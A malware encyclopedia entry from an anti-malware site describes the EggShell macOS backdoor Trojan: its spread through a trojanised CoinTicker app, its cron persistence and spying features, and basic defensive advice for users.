Home Malware Programs Mac Malware EggShell

EggShell

Posted: April 15, 2020

EggShell is a macOS or OS X backdoor Trojan and spyware that provides attackers with remote system control and data-collecting features. In some scenarios, its installation may include other threats or use disguises like cryptocurrency-tracking applications. Users should curate their downloads appropriately and let compatible anti-malware programs remove EvilEgg with all due expediency.

Trojans Getting the Goods in More than One Way

Although casual macOS users might believe that their operating system is impenetrable relatively, many high-level threats, and even PUPs like adware, have workarounds for Apple's standard security features. As an example of an ongoing security threat to such systems, EggShell provides a generous scope of attacks for any threat actor, even one without much programming experience. As a backdoor Trojan that doubles as spyware, it gives both hands-on and hands-off functionality for criminal purposes.

At least one EggShell campaign circulates the threat by bundling it inside of a corrupted cryptocurrency tracker, the so-called CoinTicker application. In this case, EggShell's installation occurs in the background alongside a very similar Trojan, EvilOSX. Other propagation models are, however, very likely.

EggShell uses the Unix equivalent of a scheduled task, a cron, for establishing persistence across reboots. If the victim mistakenly enters their password in the pop-up field during installation, it also gains root access and becomes equivalent to a rootkit. With these basics out of the way, malware researchers note the following as EggShell's more acute attacks:

  • The Trojan may download files (such as Trojan installers) and execute them or upload collected ones to a C&C.
  • EggShell has various general-purpose features for collecting information, including taking screenshots, controlling peripherals like cameras or mics (and recording them), and collecting anything the user copies to the clipboard.
  • EggShell also targets Apple-specific services, including, unusually, iTunes. It also may use iMessage for spamming or other attacks.
  • On the e-socialization servicing side, it collects Facebook cookies – possibly, as a lead-in to compromising accounts.
  • The Trojan also may generate pop-ups, disguised as default OS notifications, for acquiring credentials.

Teaching Your PC to Dance Around Eggshells

Although malware researchers don't rate EggShell's overall features or scope as being unusual, it's a flexible Trojan that performs many functions of use to both for-profit and non-profit spying operations. A threat actor may, via EggShell, hijack others' accounts and use them for propagating the Trojan further, collect content for selling on the dark Web, or install any number of additional threats. Since EggShell is specific to Apple-brand environments, it also shows the limitations of security features that try to block 'risky' applications.

Unusual pop-ups asking for permission or information like passwords are typical symptoms of an attempted backdoor Trojan infection. Besides its known affiliation with CoinTicker or EvilEgg, EggShell has other distribution tactics well within the range of possibilities. Many attackers target victims by lacing documents with macros or other exploitative content for dropping their Trojan of choice, with disguises like invoices, memos, hardware notifications or resumes.

Users can disable macros and update software appropriately as defense-strengthening habits against such drive-by-download attacks. Anti-malware products compatible with the relevant OS, also, should remove EggShell upon detecting it.

EggShell is quite the troublemaker for anyone who acts as if their Macs are invulnerable to the average hacker. Nothing it does is new to the threat landscape, but the breadth of options available to any assailant should make anyone who's downloading an e-mail attachment, or a new application, pause and think about the consequences.

Loading...